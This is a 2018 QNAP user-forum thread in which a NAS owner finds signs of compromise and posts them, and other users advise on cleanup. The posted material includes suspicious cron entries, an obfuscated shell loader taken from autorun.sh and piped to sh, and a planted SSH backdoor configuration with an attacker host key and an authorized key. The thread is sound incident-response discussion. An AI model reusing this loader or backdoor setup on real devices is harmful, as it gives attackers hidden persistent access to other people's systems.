Strange folders and cronjobs

Questions about SNMP, Power, System, Logs, disk, & RAID.
Post Reply
benzo83
Starting out
Posts: 28
Joined: Wed Nov 18, 2015 4:50 am

Strange folders and cronjobs

Post by benzo83 » Fri Sep 07, 2018 6:36 pm

Hello,
there are some strangenesses on my machine, a TS-231 with firmware Version 4.3.4.0695 (2018/08/30).

First thing, crontab: what are those jobs?

Code: Select all

[~] # crontab -l
0 4 * * * /sbin/hwclock -s
0 3 * * * /sbin/vs_refresh
0 3 * * * /sbin/clean_reset_pwd
0-59/15 * * * * /etc/init.d/nss2_dusg.sh
30 7 * * * /sbin/clean_upload_file
0 2 * * * /sbin/qfstrim
30 3 * * * /sbin/notice_log_tool -v -R
*/10 * * * * /sbin/config_cache_util 0
0 17 * * * /mnt/HDA_ROOT/.config/license/.qpkg_icon.sh >/dev/null 2>&1
0 * * * * /share/CACHEDEV1_DATA/.kZESrmRQikVE/iivwzWssiS.sh > /dev/null 2>&1 <-------------------------------------------?!?????
0 17 * * * /mnt/HDA_ROOT/.config/cups/qcloud_system_receiver_device.sh >/dev/null 2>&1
0 23 * * * /mnt/HDA_ROOT/.config/.hd_info/log_2017-04-25.sh > /dev/null 2>&1 <-------------------------------------------?!?????
0 0 * * 0 /sbin/storage_util --data_scrubbing raid_id=-1 >/dev/null 2>&1
0-59/20 3 * * * /sbin/adjust_time
0 3 * * 0 /etc/init.d/idmap.sh dump
57 9,21 * * * /sbin/notify_update -m -s -p 1>/dev/null 2>&1
10 15 * * * /usr/bin/power_clean -c 2>/dev/null
#00 03 * * * sh /share/CACHEDEV1_DATA/.qpkg/MalwareRemover/MalwareRemover.sh scan;#_QSC_:MalwareRemover:malware_remover_schedule:None:d:: [color=#0000FF]Disabled manually[/color]
0 4 * * * /etc/init.d/wsd.sh restart
4 3 * * 3 /etc/init.d/backup_conf.sh
0 0 * * * /etc/init.d/antivirus.sh archive_log
0 12 * * * /mnt/ext/opt/LicenseCenter/bin/qlicense_tool local_check
45 02 * * * /mnt/ext/opt/QcloudSSLCertificate/bin/ssl_agent_cli
35 7 * * * /sbin/qsyncsrv_util -c  > /dev/null 2>/dev/null
30 7 * * * /sbin/version_cleaner -t 0 > /dev/null 2>/dev/null
0 0 * * * /sbin/qsyncsrv_tool --fix  > /dev/null 2>/dev/null
0 */1 * * * /mnt/ext/opt/NotesStation/bin/rss_sync.sh
*/5 * * * * /mnt/ext/opt/NotesStation/bin/cronjob_svc_watch_dog.sh
40,10 * * * * /mnt/ext/opt/NotesStation/bin/verify_address.sh


This is a portion of autorun.sh content, is hashed/encrypted, why?

Code: Select all

#!/bin/sh

WDsKwcX=${NfPe}tr${TOtnQoPZlj}$XtvYzUmXi$'';XlvTWbP=$HwyETG$""${BOQDRIBofeJvZ}\\$KcLJmW$""${mBgBLqNugLIeP};WHJRnC=${AfESPMztIUpwo}${ayhM}${ifMZuHyfid}${XlvTWbP}1${ORdB}3${naPAXdYJve}3$nXrwvwbgB$'';HAFPgiL=${IQcueXfGmyiCy}${oUpr}${yVUyYguMwM}${XlvTWbP}0${cZew}5${NvQVndODqz}5$pDkAgrLTF$'';TQzLfG=${tfBBVkrxivfHq}${HJzN}${lDvZlgOBlx}${XlvTWbP}1${ybgg}3${oMdRZIuYWi}4$vcMuhGGuT$'';$WDsKwcX 'Cmi`BLh}Xfrg&vH+AjZKS'$WHJRnC't>]IV)YkTqz*QyPG{aN!OMR<cd '$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E' << "FDdIirg" | sh${rzhPJHObGUkhj}${PZYG}
E>/fJ%/Cc|mBnkq\]x[d=em$$mjlMXT&VRmjYFOf+Oc*CIN&ABwsVmjB+z\A!M+\F)[`+&RABwszI}mj-#uVK[fG&}k%nmj}} V-cD&wsmrL-62r)JWVJ%mjOX)R+&wsVOmjlzx`kPAuAUk&)BmjNNI%tz&wsmjO!)I++`R&(kWCBws)%CBmjTn=cqz-PRU)c&mj*MZ\FB bWzqxW&mjJ"TBefqA&Vwsmj+kKV&)mrL-6BrCBVmjq-OMPTn&mjT()}N`Cu*&wsmjNYC]xc&B\mrL-61rWmj=xJOY*ZlWM&ws(mjK`n(bQKcY&kWCBwsmjx NfQZ(lzeB#&VO)BwsmjZz%W\KZdRY*X[R&mXAKC=DP!xKGmrrVBCmj`ZBTle`&Vwsf)JWVmjqC\`Dx-BF&J%wsVOmjD]VQWl&)mjtz`Y] +FqM+q#Q&mrL-65rmjQbD"n*`JTWq&wsf)mjxWY! NARCF(x"DM&mjF["b&mjf[}Qq}bn(&JWVJ%wsBmrL-76rkmjnQcJ&Wmjq-G(Md`(PVdD&wsmj*]U"]!U&VBCVwsmjM)kW UMQ&f)JWVJ%mj*+dc&wsmWBu(QnK]UfQXmrr)%Cmj=#BnqY=XBl#&Bmje N+[]%}Ta&Vws(kWmjVAV=%f(Y[UX"A &CmjPNGPl(VUn(n&Bmj}KXI+BJPGtZF&ws+-WDTNPgmjYWuedb TOfInx&mj-%-J*)[APeU&mjqFW*YQN&VOwsB`Ma=RWgmjYY+=&mjA*CFd+ntQ&LLmjqAMe&mjaeDJPxbDU&wsU`BGI FRgmj}ZKcY]+VZ&mjCRVId=lBY\[*tq &mAzV!xIaIZ#Dm$$mjB`Ma=RW&mjtTJeO=zV`RXMtn}&m DJ)W(X)P=km$$13mjFdkl&3wsPB )eWdgmjc"KfNadY%&mjIQ#\a[IRGJ"NR\B&mBbT"#Y\}XPRm$$mjB`Ma=RW&mjNAc"-O%l%G]Z#C#&m\tY`)"zzu\Km$$05mjtfJn&5wsZRCtRZgmj%F"#Yu}J#&mjBTlbJu(\=tYkPtU&mI\b-u(Kkl](m$$mjB`Ma=RW&mj!d\Yb=W\JR%ue[V&m`Dn\XBN(YfYm$$13mjtt}Y&4wsm+-WDTNPsrCwVjlKk)S{Fpfr$r$rM>e(G OWnm`brmZRCtRZrrmPB )eWdr!RyU}ozXrmU`BGI FRr'aJisYtcvD]$L%+=*IxgH
&\EPhu#Td[QBNZA"-q%rsr+TUxeZR`&BA
!= *PJSsX%ikYhr$r$r\vL%#}ynGdpQDgNMzl${W-F'qw[H(crmPB )eWdrCu]Kf"armU`BGI FRrm)>tErmZRCtRZrVoOjIbrvv$F#We(ADnb]PcV $ymjTaT)nNB+dx"kWfI&mYJ}NZKfzkWXm$$mjC+BO&fkCc|B[/P(W/
gR{]Fq"Z ihulJcT-ihulS:/P(W:/
P(W:/d
"/P(W:/d
"/
P(W:/d
"/P(W/f11:/d
"/DqYmD/
P(W:/d
"/DqYmD/P(WcRYqUUmWo H< o("WmU{ b/o{</WdDD 2bv1 }} o("WmU{ IA - Z{
Z Hy cT1c vv {Ygq c.c vv "{Zd"W= DqYmD "JcT-1pcT-1BBn#[/|ScSc= Ym
{ T" (W /n#[/|n/n}#[/|n/nA "JcT-"p/nSc= {Ygq cT-"pcT-"BBn#[/|ScSc== n/nA {Ygq T-"pp#[/|S== ccA {Ygq T1== nA {Ygq .== {
mY= SRZ{
Z Ho /{ZY/YqWx(K vv YqWxo("J/{ZY/YqWx(K }} - Z{
Z Ho /UWZ/l+h_Cjju/.YqWx(K vv YqWxo("J/UWZ/l+h_Cjju/.YqWx(K= SRYqUUmWo H< K{ZYxK b /o{</WdDD 2bv1 }} K{ZYxK IA -
{o HW Ll=T-]=
/NI.nNRN#LcT-1//N//NNN/ScL|N}^N#LcT-1//N//NNN/ScL|NANR//Q=
/NI^N}NRNAN##^NR|NGN|NR.n//FSL cT-4:HT-YqWxo("S/d$(Wd].YqWxSc }
{o HW L
/
.
.
.
.
.
Z Hx cT-Uo("S/T-m"YgSc vv Yo cT-Uo("ScRZo("J;U>Z{UF Ho cT-Po("S/.Z{UF.ffffffc }} U>Z{UF Ho c/
gm"{/idPD(Y/.Z{UF.ffffffc }} U>Z{UF Ho c/UWZ/l+h_Cjju/.Z{UF.ffffffc;RZ{
Z Ho cTZo("c }} - xq" ( (W cTPo("c c/
gm"{/idPD(Yc c/UWZ/l+h_Cjjuc= oq U>o(" cT-(S/.Z{UF.wPP]rqPc b /o{</WdDD 2bv1 vv Z{
Z Ho cT-(S/.Z{UF.wPP]rqPc vv Zo("JcT-(S/.Z{UF.wPP]rqPc= oqW{=RZ{
Z Ho cTZo("c= S }} - Zo("J;U>Z{UF Ho /ZUF/.Z{UF.ffffff; vv Z{
Z Ho cTZo("c= S }} - U>o(" c/ZUF/.Z{UF.wPP]rqPc vv Zo("J/ZUF/.Z{UF.wPP]rqP vv Z{
Z Ho cTZo("c= S }} - Zo("J;U>Z{UF Ho .ffffff; vv Z{
Z Ho cTZo("c= S }} - U>o(" c.wPP]rqPc vv Zo("Jc.wPP]rqPc vv Z{
Z Ho cTZo("c= S }} Zo("J;FMo;RYF cT-m"YgSc T-Zo("SRYo T-Zo("SRZm" H]yx cT-m"YgScRK"{F H' LL !!&j' b/o{</WdDD 2bv1 vv xK"{FJcK"{F H'c }} - YqUUmWo H< xK"{F b/o{</WdDD 2bv1 vv xK"{FJxK"{F }} xK"{FJK"{F= SRR&j'RZ{
Z cTxK"{Fc }} xK"{FJK"{FRRZ{
Z Ho cT-Po("S/.T-(FmZgSc }} U>o(" HF cT-Po("S/.T-(FmZgSc }} U>o(" cT-Po("S/.T-(FmZgScRRZ{
qK(W.YK(RSRR. cT-Po("S/.T-(FmZgS/T-Y"qW
.
.
.
.
.
S.
gcRYo cT-
o("ScR"U H"x cT-Zo("ScRZ{
Z cTUo("c vv Z{
Z Ho cTUo("c vv - Yo /=
g HY c
D{{F 5= dUqdWZ T-Uo("S= "Uo(" T-Uo("Sc v S RZ"d{=RSRRRB|F#We(ADnb]PcV ||E
FDdIirg


The strange folders:
qnap_strange_folders.png


And this is the log of Malware remover, installed yesterday for the first time
qnap_malware_log.png


Am i been hacked?

Thank you
You do not have the required permissions to view the files attached to this post.

somy1982
Easy as a breeze
Posts: 356
Joined: Fri Apr 08, 2016 6:42 pm

Re: Strange folders and cronjobs

Post by somy1982 » Fri Sep 07, 2018 8:24 pm

Hi, yes you're! I'm on the same boat.
Qnap said it was due to some vulnerability in Music Station, they'll release a new malware remover to solve it.
Current version won't detect everything. Also check your autostart.sh, do you see anything strange there?

somy1982
Easy as a breeze
Posts: 356
Joined: Fri Apr 08, 2016 6:42 pm

Re: Strange folders and cronjobs

Post by somy1982 » Fri Sep 07, 2018 8:26 pm

PS: change your admin password immediately and disconnect the NAS from internet!

benzo83
Starting out
Posts: 28
Joined: Wed Nov 18, 2015 4:50 am

Re: Strange folders and cronjobs

Post by benzo83 » Fri Sep 07, 2018 8:34 pm

somy1982 wrote:Hi, yes you're! I'm on the same boat.
Qnap said it was due to some vulnerability in Music Station, they'll release a new malware remover to solve it.
Current version won't detect everything. Also check your autostart.sh, do you see anything strange there?

In my first post there is a partial content of autostart.sh with encrypted text/code

benzo83
Starting out
Posts: 28
Joined: Wed Nov 18, 2015 4:50 am

Re: Strange folders and cronjobs

Post by benzo83 » Fri Sep 07, 2018 8:40 pm

Can i delete autostart.sh content, remove the cronjob and those folders?
For now i've changed user and admin passwords and disabled all port forwarding to the nas.

somy1982
Easy as a breeze
Posts: 356
Joined: Fri Apr 08, 2016 6:42 pm

Re: Strange folders and cronjobs

Post by somy1982 » Fri Sep 07, 2018 9:01 pm

benzo83 wrote:Can i delete autostart.sh content, remove the cronjob and those folders?
For now i've changed user and admin passwords and disabled all port forwarding to the nas.

I did that, removed everything in that folder, and disable autorun from web UI. Also removed all suspicious cron jobs and their files.
But there might be more sh scripts hacked, and I don't know how to check that.

benzo83
Starting out
Posts: 28
Joined: Wed Nov 18, 2015 4:50 am

Re: Strange folders and cronjobs

Post by benzo83 » Fri Sep 07, 2018 9:23 pm

I think tthe attack started on 25 august 2018, when i was on vacation. I found other .sh file encrypted, for example "/mnt/HDA_ROOT/.config/license/.qpkg_icon.sh", it's content is encrypted.

benzo83
Starting out
Posts: 28
Joined: Wed Nov 18, 2015 4:50 am

Re: Strange folders and cronjobs

Post by benzo83 » Fri Sep 07, 2018 9:42 pm

I think i've found something interesting:
in /mnt/HDA_ROOT/.config/ , all these files dated 25/8/18

Filaname: RmclmbRZZflRRbhke

Code: Select all

-----BEGIN RSA PRIVATE KEY-----
MIIEpgIBAAKCAQEAw40vGSJIMY8/R8bmm86sCJFy6Zvf+Am7FnICRaBxaWzE72t+
+8w4WiNAdZ0AoPGNv53jgSjdErOnSpeRhkcf0AbPXxtLgB/x8LRjjIM+i6+I8UsE
OgpA0Hlx/W9jmFgtNuhwPQQ97EJX1hecRGlr6/qSzGwq+98Rbe7DxZk326ttTd31
PnBX63ws8Es4rtxl9fXwuspHdL/bn1KahV2ue+bXwwmqyK5EQlJQZkwU5g2N63gp
Op5HVIZz8Dd+DzbKrFdAktSvyla2QTVAVYW+Cjl9B8H27TW8UWohqsA7P+99UUYO
GbAbCd14sZQMuzoSCUsLSl31IAxpG/OkzIDUCwIDAQABAoIBAQCmCREtWQNNOSB0
tDgHoMJHACA+o7/V3YVBeInfTmwdJGJOGsqVxv8t4XKQqj7naFF/mfKaLvUONQXc
+rZv+aHUQoP+b7F6VyVYyAEiRClt9xviLFypXx1LJWKY2eQJbQzu6wqpdBmTqXzk
5eUj3RLqKTZNZaZVd0BYQ/troj1gQD2qgwufmFyBtYs7XK/4aQDxF/RBItH/kxGf
E8tNzI0kkAb2x4UX4uF3DN8jFV+OHCIarTcdaHWCh7737qxiKFPrCNhBmfOY27xd
2tEs/qf+SSa3RMkVVH59WPKtpTSOWmtC4f47psKdKQlvNVBThcJqUhjO84yjO8AI
FwYCjipBAoGBAP4BeNhEDITEDCONTENTFORSECURITYm68H493ufaN5kADG9aJpoH
Bq7f9dYUU8fwAIAyhJ3lK/BubvKvQJuHUzSLPpXcRj11FPI1RZFhGrikwRkC/7yM
8lBSjJlf9F+8wCYmQ+9jrsZp6/tvohM40C1nfskhAoGBAOfEQhcG9UKGz7h0kHfv
ABJ0zu67k4BjCzkGNAu7KuDgcdyfKskkhGNfkqGjeStM3/cgnRpD7ipbviX2zXP+
TFCSYOZcHKXqm/f15WEDITEDCONTENTFORSECURITYv8gpirbZ6z3JG9LP
-----END RSA PRIVATE KEY-----


Filaname: UGmfurvB

Code: Select all

Port 51163
StrictModes no
PasswordAuthentication no
ChallengeResponseAuthentication no
UsePrivilegeSeparation no
HostKey "/etc/config/RmclmbRZZflRRbhke"
AuthorizedKeysFile "/etc/config/ijfjonbVVCLuziv"


Filename: ijfjonbVVCLuziv

Code: Select all

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCv6C/HO5akwAFA2lXkOKj++HVx8erWZAkEDITEDCONTENTFORSECURITYbsXgqeOX+8HaOuCOfTOZTRqL+4cjzTHUOQtvhy/9u68+i5axHWk17/94StG7w+hCnezjVd4seRQ77tm5u9u9OZRyM1bsvSdEZqz17CU7MY5h9vszAwHWbcEDITEDCONTENTFORSECURITYRD1IdtYwY7qObQfNnMR+KFDQPzg36Jg4waiHi7xnjD6YFeoEjlcrECDrim0I+O7S6YnwpDRQuM4FkK6xiv IMJFrzEWN


Filename: .qsync.conf

Code: Select all

Port 51163
StrictModes no
PasswordAuthentication no
ChallengeResponseAuthentication no
UsePrivilegeSeparation no
HostKey "/etc/config/RmclmbRZZflRRbhke"
AuthorizedKeysFile "/etc/config/ijfjonbVVCLuziv"
Last edited by benzo83 on Fri Sep 07, 2018 9:47 pm, edited 1 time in total.

benzo83
Starting out
Posts: 28
Joined: Wed Nov 18, 2015 4:50 am

Re: Strange folders and cronjobs

Post by benzo83 » Fri Sep 07, 2018 9:45 pm

Can i safetely remove these files? Can any QNAP'S employee answer me?

robert_m_muench
Getting the hang of things
Posts: 88
Joined: Mon Feb 12, 2018 9:26 pm

Re: Strange folders and cronjobs

Post by robert_m_muench » Fri Sep 07, 2018 10:08 pm

Make a backup so this can be analyzed further. And yes, just delete all this "*ç%& I even de-installed all affected apps.

You can skim through the .sh files in your .qpkg directory, where all your apps are installed to see where this stuff was added.
TVS-1282T3
CPU: Intel Core i7-7700 CPU @ 3.60GHz
Memory: 64 GB
2 x Samsung SSD 850 EVO M.2 1TB (M.2 SATA)
2 x Samsung SSD 860 EVO 2TB (SATA)
4 x WDC WD6002FFWX-68TZ4N0 (SATA) (6TB)
4 x Seagate ST12000VN0007-2GS116 (SATA) (12TB)

somy1982
Easy as a breeze
Posts: 356
Joined: Fri Apr 08, 2016 6:42 pm

Re: Strange folders and cronjobs

Post by somy1982 » Fri Sep 07, 2018 10:18 pm

Hi,
I also notice many files are edited or created on 25/8. However I also have some suspicious file created back on 9/8.
Please keep posting the files you found suspicious for further analysis. Also look into /etc/config and see any hidden sh.
I remember I had to remove something (hint from cron job) from a folder like apache/extra/QTS.sh, content is encrypted as well.

benzo83
Starting out
Posts: 28
Joined: Wed Nov 18, 2015 4:50 am

Re: Strange folders and cronjobs

Post by benzo83 » Fri Sep 07, 2018 10:20 pm

robert_m_muench wrote:Make a backup so this can be analyzed further. And yes, just delete all this "*ç%& I even de-installed all affected apps.

You can skim through the .sh files in your .qpkg directory, where all your apps are installed to see where this stuff was added.

Can the files content i posted above used to decode the autorun.sh?

benzo83
Starting out
Posts: 28
Joined: Wed Nov 18, 2015 4:50 am

Re: Strange folders and cronjobs

Post by benzo83 » Fri Sep 07, 2018 10:21 pm

The only solution is to wipe all and reinstall the system, but i need to buy a new hdd from amazon to backup 3TB :/
edit: where is located autorun.sh?

dolbyman
Guru
Posts: 19671
Joined: Sat Feb 12, 2011 2:11 am
Location: Vancouver BC , Canada

Re: Strange folders and cronjobs

Post by dolbyman » Fri Sep 07, 2018 10:23 pm

well you should always do external backups anyways..so a good reason to start

benzo83
Starting out
Posts: 28
Joined: Wed Nov 18, 2015 4:50 am

Re: Strange folders and cronjobs

Post by benzo83 » Fri Sep 07, 2018 10:24 pm

dolbyman wrote:well you should always do external backups anyways..so a good reason to start

i have other two backup for file and documents, but not for movies that are too big to move

Post Reply

Return to “System & Disk Volume Management”